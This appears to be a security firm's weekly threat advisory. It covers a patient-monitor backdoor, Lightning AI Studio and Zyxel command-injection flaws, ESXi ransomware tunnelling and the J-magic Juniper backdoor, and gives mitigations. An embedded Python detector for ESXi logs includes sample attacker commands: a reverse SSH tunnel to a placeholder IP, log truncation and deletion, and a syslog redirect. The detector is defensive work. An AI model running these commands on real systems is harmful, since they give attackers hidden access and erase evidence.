Backdoor in Patient Monitors Enables Data Theft, Remote Code Execution via Chinese IP

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities reported across various platforms, and the incidents highlight the growing sophistication of threats targeting critical systems. They include the discovery of a backdoor in Contec CMS8000 patient monitors, enabling unauthorized data theft and remote code execution via a Chinese IP, which persists despite firmware updates. A critical RCE vulnerability in Lightning AI Studio (CVSS 9.4) exposed users to remote attacks, allowing unauthorized access through a hidden URL parameter before being patched in October 2024. Active exploitation of CVE-2024-40891 in Zyxel CPE devices has also been reported, with over 1,500 exposed systems targeted via Telnet for command injection attacks. Meanwhile, ransomware operators are exploiting VMware ESXi hypervisors by abusing SSH tunneling for stealth and persistence, emphasizing the importance of log centralization and proactive monitoring. Lastly, the J-magic malware campaign has been identified targeting Juniper VPN gateways, leveraging a custom backdoor and an RSA-based challenge-response mechanism to ensure only its operator can use it. These developments underscore the urgent need for organizations to stay vigilant, maintain robust security controls, and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action to defend against the latest critical threats.


1. Backdoor in Patient Monitors Enables Data Theft, Remote Code Execution

CISA has identified a critical backdoor in Contec CMS8000 patient monitoring devices, which secretly transmits patient data to a remote Chinese IP and allows unauthorized remote code execution. Despite multiple firmware updates, the backdoor persists, with Contec failing to provide an effective fix. The vulnerability enables network access, allowing complete device takeover by mounting a remote NFS share and sending patient data over an unexpected port, indicating malicious intent. Given the lack of an official patch, CISA urges healthcare organizations to disconnect affected devices from networks immediately. Organizations should also monitor for anomalies such as unexpected data changes or unusual network activity, restrict network access to essential equipment, apply strict firewall rules, and conduct forensic analysis for signs of compromise. Exploring alternative vendors for patient monitoring solutions is advised, and raising awareness within healthcare institutions is crucial for mitigating risks associated with this threat.

2. Critical RCE Vulnerability in Lightning AI Studio Exposes Users to Remote Attacks

A critical vulnerability in Lightning AI Studio allowed remote code execution (RCE) with root privileges by exploiting a hidden URL parameter. Attackers could inject Base64-encoded commands, gaining unauthorized access, exfiltrating sensitive data, and manipulating system files. Particularly concerning, only a publicly available profile username was needed to craft an exploit. The issue, assigned a CVSS score of 9.4, was patched on October 25, 2024, following responsible disclosure. Users must update their environments immediately to mitigate risks. Organizations should also restrict URL access with strict controls, monitor logs for anomalies, and sanitize input parameters to prevent command injection. Additionally, limiting privileged execution in AI environments is crucial to reducing attack impact. This incident highlights the need for stronger security measures in AI model development platforms to prevent unauthorized access and data theft.

3. Unpatched Vulnerability in Zyxel CPE Devices Sparks Active Exploitation

A critical zero-day vulnerability (CVE-2024-40891) in Zyxel CPE Series devices is being actively exploited, enabling unauthenticated attackers to execute arbitrary commands via Telnet. Attack attempts, mainly from Taiwan, have targeted over 1,500 exposed devices. Similar to CVE-2024-40890, this command injection flaw allows remote attackers to take over systems, exfiltrate data, and move laterally across networks. First reported in July 2024 by VulnCheck, the vulnerability remains unpatched, with active exploitation traced to multiple IPs. Organizations should immediately restrict administrative access to trusted IPs, monitor traffic for unusual HTTP requests or Telnet activity, and isolate critical devices to enhance security. While awaiting Zyxel’s official patch, network segmentation can help limit exposure. This incident underscores the urgent need for proactive monitoring and security measures to mitigate risks associated with unpatched vulnerabilities in network infrastructure.

4. Ransomware Exploits ESXi Hypervisors via SSH Tunneling

Ransomware actors are increasingly targeting VMware ESXi hypervisors, leveraging SSH tunneling for persistence and stealth by exploiting vulnerabilities or compromised credentials. Due to visibility gaps in ESXi logs and limited SSH activity monitoring, attackers can move laterally, deploy ransomware, and disrupt virtualized environments. By abusing ESXi’s built-in SSH service, attackers establish backdoors using native SSH commands, ensuring prolonged access. The challenge lies in detecting malicious activity across multiple log files, as attackers often modify or clear logs to evade detection. Organizations must centralize ESXi logs via syslog forwarding and integrate them into SIEM solutions like SISA’s ProACT MXDR for real-time monitoring and advanced threat analysis. Disabling SSH when not needed, enforcing MFA, applying security patches, and monitoring critical logs for anomalies can help mitigate risks. Additionally, reviewing firewall configurations, conducting proactive threat hunting, and backing up ESXi configurations regularly are essential measures to ensure resilience against ransomware threats.
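A minimal detection pass over centralized ESXi shell-history lines, added here as an example (it is not SISA's or VMware's code): the sample lines are constructed and only loosely follow the shell.log layout, and the three rules (SSH forwarding flags, tampering with files under the log directories, and repointing the syslog loghost) are a starting point a team would tune against its own baseline.

```python
import re

# Constructed sample lines, loosely modelled on ESXi shell.log entries as
# they arrive over syslog forwarding; they are not from a real incident.
SAMPLE_LOG = """\
2024-06-01T08:01:10Z shell[2001]: [root]: esxcli network ip interface list
2024-06-01T08:03:42Z shell[2001]: [root]: ssh -fN -R 2222:127.0.0.1:22 op@203.0.113.45
2024-06-01T08:04:05Z shell[2001]: [root]: /bin/sh -c '> /var/log/shell.log'
2024-06-01T08:05:17Z shell[2002]: [root]: esxcli system syslog config set --loghost=udp://127.0.0.1:514
2024-06-01T08:06:30Z shell[2002]: [root]: rm -f /var/log/auth.log /scratch/log/hostd.log
2024-06-01T08:07:01Z shell[2002]: [root]: vim-cmd vmsvc/getallvms
"""

SHELL_LINE = re.compile(
    r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")

# Each rule: (category, predicate over the command string)
RULES = [
    # ssh invoked with a forwarding flag (-R reverse, -L local, -D dynamic),
    # possibly bundled with other single-letter flags such as -fN
    ("ssh_tunnel", lambda c: re.search(r"\bssh\b", c) is not None
                              and re.search(r"\s-[A-Za-z]*[RLD]\b", c) is not None),
    # truncating or deleting files under the ESXi log directories
    ("log_tamper", lambda c: re.search(
        r"(?:\brm\b|\btruncate\b|>)\s*(?:-\w+\s+)*\S*/(?:var|scratch)/log/", c) is not None),
    # pointing syslog at a new loghost silently breaks central collection
    ("syslog_reconfig", lambda c: re.search(r"\bsyslog\b.*\bconfig set\b", c) is not None),
]


def scan(log_text: str) -> list[dict]:
    """Return one finding per (shell-history line, matched rule)."""
    findings = []
    for line in log_text.splitlines():
        m = SHELL_LINE.match(line)
        if not m:
            continue  # not a shell-history line; other ESXi logs are out of scope here
        cmd = m.group("cmd")
        for category, matches in RULES:
            if matches(cmd):
                findings.append({"ts": m.group("ts"), "user": m.group("user"),
                                 "category": category, "cmd": cmd})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']:<6} {f['category']:<16} {f['cmd']}")
```

Because the rules read the forwarded copy rather than the host's local files, a later clearing of shell.log on the hypervisor does not erase what was already collected.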

5. Stealthy J-magic Malware: A Custom Backdoor Targeting Juniper VPN Gateways

The J-magic malware campaign targets Juniper edge devices configured as VPN gateways, compromising critical sectors like semiconductor, energy, manufacturing, and IT. Active from mid-2023 to mid-2024, it employs a customized variant of the cd00r backdoor, passively monitoring network traffic for a “magic packet” to activate a reverse shell. To prevent unauthorized exploitation, J-magic incorporates an RSA-based challenge-response mechanism, ensuring only the intended attacker can use the backdoor. Communication with the Command-and-Control (C2) server (IP: 198.46.158[.]172) is secured via RSA encryption.

Key indicators of compromise (IoCs) include file hashes, the JunoscriptService file, and anomalous process names ([nfsiod 0], [nfsiod 1]). Organizations should block the known C2 IP, update firmware on Juniper devices, deploy endpoint detection tools, and monitor for unusual TCP traffic or RSA challenge-response activity. Immediate device quarantine and sharing IoCs with threat intelligence networks are essential to contain the threat and prevent further exploitation.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
